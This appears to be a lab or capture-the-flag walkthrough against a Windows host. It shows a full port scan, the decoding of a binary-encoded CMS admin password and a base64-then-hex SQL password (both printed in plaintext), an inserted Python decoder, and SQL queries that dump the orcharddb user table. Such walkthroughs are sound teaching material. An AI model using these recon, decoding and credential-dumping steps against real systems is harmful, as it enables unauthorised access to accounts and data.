$ nmap -p- 10.10.10.52
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-18 13:39 CST
Nmap scan report for 10.10.10.52
Host is up (0.067s latency).
Not shown: 65508 closed ports
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1337/tcp  open  waste
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
8080/tcp  open  http-proxy
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49164/tcp open  unknown
49165/tcp open  unknown
49168/tcp open  unknown
50255/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 903.78 seconds
1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.
# There are many blank lines here; at the very bottom of the page there is also:
Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez
blog admin password
The value obtained above is the password in binary form; decoding it gives the password:
@dm!n_P@ssW0rd!
However, there is nothing exploitable in this admin interface.
sql password
In addition, base64-decoding and then hex-decoding the file name yields the database password; the username is admin:
m$$ql_S@_P@ssW0rd!
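Both values above are encoded rather than encrypted, so anyone who can read the note can reverse them without a key. The following Python is an added example, not part of the original write-up: it decodes the bit string from the note and runs the base64-then-hex chain on a constructed sample token (the real file name is not reproduced on this page); all function names and the sample secret are this example's own.

```python
import base64
import string

# Bit string copied from the note shown earlier on this page.
NOTE_BITS = "010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001"
# Constructed sample value, not taken from the target.
SAMPLE_SECRET = "constructed-example-secret"


def decode_bits(bits: str) -> str:
    """Decode 8-bit ASCII codes written out as '0'/'1' characters."""
    bits = "".join(bits.split())
    if not bits or len(bits) % 8 or set(bits) - {"0", "1"}:
        raise ValueError("expected a 0/1 string whose length is a multiple of 8")
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8)).decode("ascii")


def encode_b64_hex(secret: str) -> str:
    """Build a base64(hex(secret)) token; used only to create the sample."""
    return base64.b64encode(secret.encode("ascii").hex().encode("ascii")).decode("ascii")


def decode_b64_hex(token: str) -> str:
    """Undo base64, then hex: the two layers described for the file name."""
    hex_text = base64.b64decode(token, validate=True).decode("ascii")
    return bytes.fromhex(hex_text).decode("ascii")


def classify(token: str):
    """Return (encoding, plaintext) if the token is merely encoded, else None."""
    for name, decoder in (("bits", decode_bits), ("base64-hex", decode_b64_hex)):
        try:
            text = decoder(token)
        except ValueError:  # also covers binascii.Error and UnicodeDecodeError
            continue
        if text and all(c in string.printable for c in text):
            return name, text
    return None


SAMPLE_TOKEN = encode_b64_hex(SAMPLE_SECRET)

if __name__ == "__main__":
    for token in (NOTE_BITS, SAMPLE_TOKEN, "not encoded"):
        print(classify(token))
```

A check like `classify` can be run over notes, file names and configuration values during a review to flag secrets that are only obfuscated by a reversible encoding.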
orcharddb
Then connect to the database and look through it to obtain the username and password information:
SELECT name FROM master.dbo.sysdatabases;
SELECT * FROM orcharddb.INFORMATION_SCHEMA.TABLES;
SELECT * FROM orcharddb.INFORMATION_SCHEMA.COLUMNS;
USE orcharddb;
SELECT * FROM blog_Orchard_Users_UserPartRecord;